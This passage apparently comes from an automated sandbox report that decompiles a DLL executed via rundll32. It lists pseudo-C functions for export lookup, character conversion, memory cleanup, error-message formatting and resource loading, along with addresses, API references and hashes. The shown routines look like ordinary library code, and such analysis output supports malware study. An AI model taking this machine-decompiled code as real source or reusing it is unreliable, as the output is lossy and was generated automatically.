                                                                                                        					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
                                                                                                        						SetLastError(0x7f);
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                                                                                                        							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
                                                                                                        							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
                                                                                                        							_v24 = 0;
                                                                                                        							_v28 = 0;
                                                                                                        							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
                                                                                                        								_t79 = E10001F70(_a8, _v20 +  *_v32);
                                                                                                        								_t119 = _t119 + 8;
                                                                                                        								if(_t79 != 0) {
                                                                                                        									_v28 = _v28 + 1;
                                                                                                        									_v32 = _v32 + 4;
                                                                                                        									_v36 =  &(_v36[1]);
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								_v12 =  *_v36 & 0x0000ffff;
                                                                                                        								_v24 = 1;
                                                                                                        								break;
                                                                                                        							}
                                                                                                        							if(_v24 != 0) {
                                                                                                        								L17:
                                                                                                        								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
                                                                                                        									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                                                                                                        								}
                                                                                                        								SetLastError(0x7f);
                                                                                                        								return 0;
                                                                                                        							}
                                                                                                        							SetLastError(0x7f);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
                                                                                                        							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
                                                                                                        							goto L17;
                                                                                                        						}
                                                                                                        						SetLastError(0x7f);
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				SetLastError(0x7f);
                                                                                                        				return 0;
                                                                                                        			}














                                                                                                        0x10002d56
                                                                                                        0x10002d5f
                                                                                                        0x10002d62
                                                                                                        0x10002d71
                                                                                                        0x10002d7b
                                                                                                        0x10002d94
                                                                                                        0x10002d9e
                                                                                                        0x10002dab
                                                                                                        0x00000000
                                                                                                        0x10002db8
                                                                                                        0x10002dc3
                                                                                                        0x10002e0b
                                                                                                        0x10002e17
                                                                                                        0x10002e1a
                                                                                                        0x10002e21
                                                                                                        0x10002e45
                                                                                                        0x10002e5d
                                                                                                        0x10002e62
                                                                                                        0x10002e67
                                                                                                        0x10002e30
                                                                                                        0x10002e39
                                                                                                        0x10002e42
                                                                                                        0x00000000
                                                                                                        0x10002e42
                                                                                                        0x10002e6f
                                                                                                        0x10002e72
                                                                                                        0x00000000
                                                                                                        0x10002e72
                                                                                                        0x10002e81
                                                                                                        0x10002e8f
                                                                                                        0x10002e98
                                                                                                        0x00000000
                                                                                                        0x10002eb5
                                                                                                        0x10002e9c
                                                                                                        0x00000000
                                                                                                        0x10002ea2
                                                                                                        0x10002e85
                                                                                                        0x00000000
                                                                                                        0x10002e8b
                                                                                                        0x10002dd7
                                                                                                        0x10002dfa
                                                                                                        0x00000000
                                                                                                        0x10002dfa
                                                                                                        0x10002ddb
                                                                                                        0x00000000
                                                                                                        0x10002de1
                                                                                                        0x10002d9e
                                                                                                        0x10002d7f
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 10002D7F
                                                                                                        • SetLastError.KERNEL32(0000007F), ref: 10002DAB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 1452528299-0
                                                                                                        • Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                        • Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
                                                                                                        • Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
                                                                                                        • Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                        				char _v8;
                                                                                                        				signed int _v12;
                                                                                                        				char _v20;
                                                                                                        				char _t43;
                                                                                                        				char _t46;
                                                                                                        				signed int _t53;
                                                                                                        				signed int _t54;
                                                                                                        				intOrPtr _t56;
                                                                                                        				intOrPtr _t57;
                                                                                                        				int _t58;
                                                                                                        				signed short* _t59;
                                                                                                        				short* _t60;
                                                                                                        				int _t65;
                                                                                                        				char* _t72;
                                                                                                        
                                                                                                        				_t72 = _a8;
                                                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                                                        					L5:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					if( *_t72 != 0) {
                                                                                                        						E10016E2B( &_v20, __edi, _a16);
                                                                                                        						_t43 = _v20;
                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                        							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
                                                                                                        							__eflags = _t46;
                                                                                                        							if(_t46 == 0) {
                                                                                                        								__eflags = _a4;
                                                                                                        								_t40 = _v20 + 4; // 0x840ffff8
                                                                                                        								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                        								if(__eflags != 0) {
                                                                                                        									L10:
                                                                                                        									__eflags = _v8;
                                                                                                        									if(_v8 != 0) {
                                                                                                        										_t53 = _v12;
                                                                                                        										_t11 = _t53 + 0x70;
                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                        										__eflags =  *_t11;
                                                                                                        									}
                                                                                                        									return 1;
                                                                                                        								}
                                                                                                        								L21:
                                                                                                        								_t54 = E10017D62(__eflags);
                                                                                                        								 *_t54 = 0x2a;
                                                                                                        								__eflags = _v8;
                                                                                                        								if(_v8 != 0) {
                                                                                                        									_t54 = _v12;
                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                        									__eflags =  *_t33;
                                                                                                        								}
                                                                                                        								return _t54 | 0xffffffff;
                                                                                                        							}
                                                                                                        							_t56 = _v20;
                                                                                                        							_t15 = _t56 + 0xac; // 0xa045ff98
                                                                                                        							_t65 =  *_t15;
                                                                                                        							__eflags = _t65 - 1;
                                                                                                        							if(_t65 <= 1) {
                                                                                                        								L17:
                                                                                                        								_t24 = _t56 + 0xac; // 0xa045ff98
                                                                                                        								__eflags = _a12 -  *_t24;
                                                                                                        								if(__eflags < 0) {
                                                                                                        									goto L21;
                                                                                                        								}
                                                                                                        								__eflags = _t72[1];
                                                                                                        								if(__eflags == 0) {
                                                                                                        									goto L21;
                                                                                                        								}
                                                                                                        								L19:
                                                                                                        								__eflags = _v8;
                                                                                                        								_t27 = _t56 + 0xac; // 0xa045ff98
                                                                                                        								_t57 =  *_t27;
                                                                                                        								if(_v8 == 0) {
                                                                                                        									return _t57;
                                                                                                        								}
                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                        								return _t57;
                                                                                                        							}
                                                                                                        							__eflags = _a12 - _t65;
                                                                                                        							if(_a12 < _t65) {
                                                                                                        								goto L17;
                                                                                                        							}
                                                                                                        							__eflags = _a4;
                                                                                                        							_t21 = _t56 + 4; // 0x840ffff8
                                                                                                        							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                        							__eflags = _t58;
                                                                                                        							_t56 = _v20;
                                                                                                        							if(_t58 != 0) {
                                                                                                        								goto L19;
                                                                                                        							}
                                                                                                        							goto L17;
                                                                                                        						}
                                                                                                        						_t59 = _a4;
                                                                                                        						__eflags = _t59;
                                                                                                        						if(_t59 != 0) {
                                                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        					} else {
                                                                                                        						_t60 = _a4;
                                                                                                        						if(_t60 != 0) {
                                                                                                        							 *_t60 = 0;
                                                                                                        						}
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

















                                                                                                        0x10023e8b
                                                                                                        0x10023e92
                                                                                                        0x10023ea7
                                                                                                        0x00000000
                                                                                                        0x10023e99
                                                                                                        0x10023e9b
                                                                                                        0x10023eb3
                                                                                                        0x10023eb8
                                                                                                        0x10023ebb
                                                                                                        0x10023ebe
                                                                                                        0x10023ee7
                                                                                                        0x10023eec
                                                                                                        0x10023ef0
                                                                                                        0x10023f71
                                                                                                        0x10023f83
                                                                                                        0x10023f8c
                                                                                                        0x10023f8e
                                                                                                        0x10023ece
                                                                                                        0x10023ece
                                                                                                        0x10023ed1
                                                                                                        0x10023ed3
                                                                                                        0x10023ed6
                                                                                                        0x10023ed6
                                                                                                        0x10023ed6
                                                                                                        0x10023ed6
                                                                                                        0x00000000
                                                                                                        0x10023edc
                                                                                                        0x10023f50
                                                                                                        0x10023f50
                                                                                                        0x10023f55
                                                                                                        0x10023f5b
                                                                                                        0x10023f5e
                                                                                                        0x10023f60
                                                                                                        0x10023f63
                                                                                                        0x10023f63
                                                                                                        0x10023f63
                                                                                                        0x10023f63
                                                                                                        0x00000000
                                                                                                        0x10023f67
                                                                                                        0x10023ef2
                                                                                                        0x10023ef5
                                                                                                        0x10023ef5
                                                                                                        0x10023efb
                                                                                                        0x10023efe
                                                                                                        0x10023f25
                                                                                                        0x10023f28
                                                                                                        0x10023f28
                                                                                                        0x10023f2e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f30
                                                                                                        0x10023f33
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f35
                                                                                                        0x10023f35
                                                                                                        0x10023f38
                                                                                                        0x10023f38
                                                                                                        0x10023f3e
                                                                                                        0x10023eac
                                                                                                        0x10023eac
                                                                                                        0x10023f47
                                                                                                        0x00000000
                                                                                                        0x10023f47
                                                                                                        0x10023f00
                                                                                                        0x10023f03
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f07
                                                                                                        0x10023f15
                                                                                                        0x10023f18
                                                                                                        0x10023f1e
                                                                                                        0x10023f20
                                                                                                        0x10023f23
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10023f23
                                                                                                        0x10023ec0
                                                                                                        0x10023ec3
                                                                                                        0x10023ec5
                                                                                                        0x10023ecb
                                                                                                        0x10023ecb
                                                                                                        0x00000000
                                                                                                        0x10023e9d
                                                                                                        0x10023e9d
                                                                                                        0x10023ea2
                                                                                                        0x10023ea4
                                                                                                        0x10023ea4
                                                                                                        0x00000000
                                                                                                        0x10023ea2
                                                                                                        0x10023e9b

                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
                                                                                                        • __isleadbyte_l.LIBCMT ref: 10023EE7
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                        • Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
                                                                                                        • Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
                                                                                                        • Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				intOrPtr _t29;
                                                                                                        				intOrPtr _t32;
                                                                                                        				intOrPtr _t35;
                                                                                                        				intOrPtr _t36;
                                                                                                        				intOrPtr _t37;
                                                                                                        				signed int _t39;
                                                                                                        				void* _t47;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				void* _t50;
                                                                                                        				void* _t51;
                                                                                                        				void* _t64;
                                                                                                        				void* _t65;
                                                                                                        				intOrPtr _t66;
                                                                                                        				void* _t68;
                                                                                                        				void* _t70;
                                                                                                        
                                                                                                        				_t65 = __edi;
                                                                                                        				_t64 = __edx;
                                                                                                        				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
                                                                                                        				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                                                                        				if(_t29 == 0) {
                                                                                                        					L19:
                                                                                                        					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                                                                        				}
                                                                                                        				_t32 = _t29 - 1;
                                                                                                        				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                                                                        				if(_t32 != 0) {
                                                                                                        					goto L19;
                                                                                                        				}
                                                                                                        				if(_a4 == 0) {
                                                                                                        					L8:
                                                                                                        					_push(_t65);
                                                                                                        					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
                                                                                                        					_t70 = E100139DB(0x10058f44);
                                                                                                        					if(_t70 == 0 || _t66 == 0) {
                                                                                                        						L18:
                                                                                                        						goto L19;
                                                                                                        					} else {
                                                                                                        						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                        						_t80 = _t35;
                                                                                                        						if(_t35 == 0) {
                                                                                                        							L12:
                                                                                                        							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                                                                        								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                        								_a4 = _a4 & 0x00000000;
                                                                                                        								_t83 = _t36;
                                                                                                        								if(_t36 != 0) {
                                                                                                        									_push(_t36);
                                                                                                        									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
                                                                                                        									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                                                                        									_a4 = _t39;
                                                                                                        									E10016380(_t51, _t66, _t70, _t83);
                                                                                                        								}
                                                                                                        								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                                                                        								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                                                                        								if(_t37 == 0 && _a4 != _t37) {
                                                                                                        									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						_push(_t35);
                                                                                                        						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                                                                        							goto L18;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if(_a4 != 0xffffffff) {
                                                                                                        					_t47 = E1000B510();
                                                                                                        					if(_t47 != 0) {
                                                                                                        						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                                                                        						_t77 = _t48;
                                                                                                        						if(_t48 != 0) {
                                                                                                        							 *_t48(0, 0);
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                                                                        				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                                                                        				goto L8;
                                                                                                        			}





















                                                                                                        0x100145b9
                                                                                                        0x100145b9
                                                                                                        0x100145c3
                                                                                                        0x100145c5
                                                                                                        0x100145cc
                                                                                                        0x100146a4
                                                                                                        0x100146af
                                                                                                        0x100146af
                                                                                                        0x100145d2
                                                                                                        0x100145d5
                                                                                                        0x100145d8
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100145e1
                                                                                                        0x10014625
                                                                                                        0x10014625
                                                                                                        0x1001462b
                                                                                                        0x10014638
                                                                                                        0x1001463c
                                                                                                        0x100146a3
                                                                                                        0x00000000
                                                                                                        0x10014642
                                                                                                        0x10014642
                                                                                                        0x10014645
                                                                                                        0x10014647
                                                                                                        0x10014658
                                                                                                        0x1001465f
                                                                                                        0x10014661
                                                                                                        0x10014664
                                                                                                        0x10014668
                                                                                                        0x1001466a
                                                                                                        0x1001466c
                                                                                                        0x1001466d
                                                                                                        0x10014672
                                                                                                        0x10014675
                                                                                                        0x10014678
                                                                                                        0x1001467e
                                                                                                        0x10014685
                                                                                                        0x1001468d
                                                                                                        0x10014690
                                                                                                        0x100146a0
                                                                                                        0x100146a0
                                                                                                        0x10014690
                                                                                                        0x00000000
                                                                                                        0x1001465f
                                                                                                        0x10014649
                                                                                                        0x10014656
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10014656
                                                                                                        0x1001463c
                                                                                                        0x100145e7
                                                                                                        0x100145e9
                                                                                                        0x100145f0
                                                                                                        0x100145f2
                                                                                                        0x100145f5
                                                                                                        0x100145f7
                                                                                                        0x100145fb
                                                                                                        0x100145fb
                                                                                                        0x100145f7
                                                                                                        0x100145f0
                                                                                                        0x10014600
                                                                                                        0x10014608
                                                                                                        0x10014610
                                                                                                        0x10014618
                                                                                                        0x10014620
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __msize_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1288803200-0
                                                                                                        • Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                        • Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
                                                                                                        • Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                        • Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 87%
                                                                                                        			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                                                                        				intOrPtr* _v0;
                                                                                                        				void* _v4;
                                                                                                        				signed int _v8;
                                                                                                        				intOrPtr _v16;
                                                                                                        				void* _t20;
                                                                                                        				intOrPtr* _t23;
                                                                                                        				void* _t29;
                                                                                                        				void* _t31;
                                                                                                        				intOrPtr _t35;
                                                                                                        				char _t36;
                                                                                                        				void* _t40;
                                                                                                        				void* _t42;
                                                                                                        				void* _t44;
                                                                                                        
                                                                                                        				_t44 = __eflags;
                                                                                                        				_t38 = __esi;
                                                                                                        				_t37 = __edi;
                                                                                                        				_t31 = __ebx;
                                                                                                        				_push(4);
                                                                                                        				E10017BC1(E10027DA5, __ebx, __edi, __esi);
                                                                                                        				_t35 = E10009B91(_t44, 0xc);
                                                                                                        				_v16 = _t35;
                                                                                                        				_t20 = 0;
                                                                                                        				_v4 = 0;
                                                                                                        				if(_t35 != 0) {
                                                                                                        					_t20 = E10009CDE(_t35);
                                                                                                        				}
                                                                                                        				_t36 = _a4;
                                                                                                        				_v8 = _v8 | 0xffffffff;
                                                                                                        				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                                                                        				_a4 = _t20;
                                                                                                        				E10017C83( &_a4, 0x1002e16c);
                                                                                                        				asm("int3");
                                                                                                        				_t40 = _t42;
                                                                                                        				_t23 = _v0;
                                                                                                        				_push(_t31);
                                                                                                        				if(_t23 != 0) {
                                                                                                        					 *_t23 = 0;
                                                                                                        				}
                                                                                                        				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                                                                        					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                                                                        					LocalFree(_a12);
                                                                                                        					_t29 = 1;
                                                                                                        					__eflags = 1;
                                                                                                        				} else {
                                                                                                        					 *_a4 = 0;
                                                                                                        					_t29 = 0;
                                                                                                        				}
                                                                                                        				return _t29;
                                                                                                        			}
















                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d34
                                                                                                        0x10009d3b
                                                                                                        0x10009d48
                                                                                                        0x10009d4a
                                                                                                        0x10009d4d
                                                                                                        0x10009d51
                                                                                                        0x10009d54
                                                                                                        0x10009d56
                                                                                                        0x10009d56
                                                                                                        0x10009d5b
                                                                                                        0x10009d5e
                                                                                                        0x10009d62
                                                                                                        0x10009d65
                                                                                                        0x10009d71
                                                                                                        0x10009d76
                                                                                                        0x10009d78
                                                                                                        0x10009d7a
                                                                                                        0x10009d7d
                                                                                                        0x10009d82
                                                                                                        0x10009d84
                                                                                                        0x10009d84
                                                                                                        0x10009da2
                                                                                                        0x10009db8
                                                                                                        0x10009dc3
                                                                                                        0x10009dcb
                                                                                                        0x10009dcb
                                                                                                        0x10009da4
                                                                                                        0x10009da7
                                                                                                        0x10009da9
                                                                                                        0x10009da9
                                                                                                        0x10009dce

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10009D3B
                                                                                                          • Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 10009D71
                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A
                                                                                                          • Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D
                                                                                                        • LocalFree.KERNEL32(?), ref: 10009DC3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.304032421.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.304028331.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304060636.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304077938.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304103291.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304109553.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.304121863.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 1615547351-0
                                                                                                        • Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                        • Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
                                                                                                        • Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                        • Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 90%
                                                                                                        			E1000C887(void* __ecx) {
                                                                                                        				void* _v8;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t23;
                                                                                                        				void* _t28;
                                                                                                        				void* _t30;
                                                                                                        				struct HINSTANCE__* _t32;
                                                                                                        				signed int _t34;
                                                                                                        				signed short _t35;
                                                                                                        				void* _t37;
                                                                                                        				signed short* _t40;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_push(_t28);
                                                                                                        				_t37 = __ecx;
                                                                                                        				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                        				_t40 =  *(__ecx + 0x60);
                                                                                                        				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                        					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
                                                                                                        					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                                                                        				}
                                                                                                        				if(_v8 != 0) {
                                                                                                        					_t40 = LockResource(_v8);
                                                                                                        				}
                                                                                                        				_t30 = 1;
                                                                                                        				if(_t40 != 0) {
                                                                                                        					_t35 =  *_t40;
                                                                                                        					if(_t40[1] != 0xffff) {
                                                                                                        						_t23 = _t40[5] & 0x0000ffff;
                                                                                                        						_t34 = _t40[6] & 0x0000ffff;
                                                                                                        					} else {
                                                                                                        						_t35 = _t40[6];
                                                                                                        						_t23 = _t40[9] & 0x0000ffff;
                                                                                                        						_t34 = _t40[0xa] & 0x0000ffff;
                                                                                                        					}
                                                                                                        					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                                                                        						_t30 = 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				if( *(_t37 + 0x58) != 0) {
                                                                                                        					FreeResource(_v8);
                                                                                                        				}
                                                                                                        				return _t30;
                                                                                                        			}
















                                                                                                        0x1000c88a
                                                                                                        0x1000c88b
                                                                                                        0x1000c88e
                                                                                                        0x1000c890
                                                                                                        0x1000c897
                                                                                                        0x1000c89a
                                                                                                        0x1000c89d
                                                                                                        0x1000c8a4
                                                                                                        0x1000c8bb
                                                                                                        0x1000c8bb
                                                                                                        0x1000c8c2
                                                                                                        0x1000c8cd
                                                                                                        0x1000c8cd
                                                                                                        0x1000c8d1
                                                                                                        0x1000c8d4
                                                                                                        0x1000c8dc
                                                                                                        0x1000c8de
                                                                                                        0x1000c8ed
                                                                                                        0x1000c8f1
                                                                                                        0x1000c8e0
                                                                                                        0x1000c8e0
                                                                                                        0x1000c8e3
                                                                                                        0x1000c8e7
                                                                                                        0x1000c8e7
                                                                                                        0x1000c8fa
                                                                                                        0x1000c906
                                                                                                        0x1000c906
                                                                                                        0x1000c8fa
                                                                                                        0x1000c90c
                                                                                                        0x1000c911
                                                                                                        0x1000c911
                                                                                                        0x1000c91d

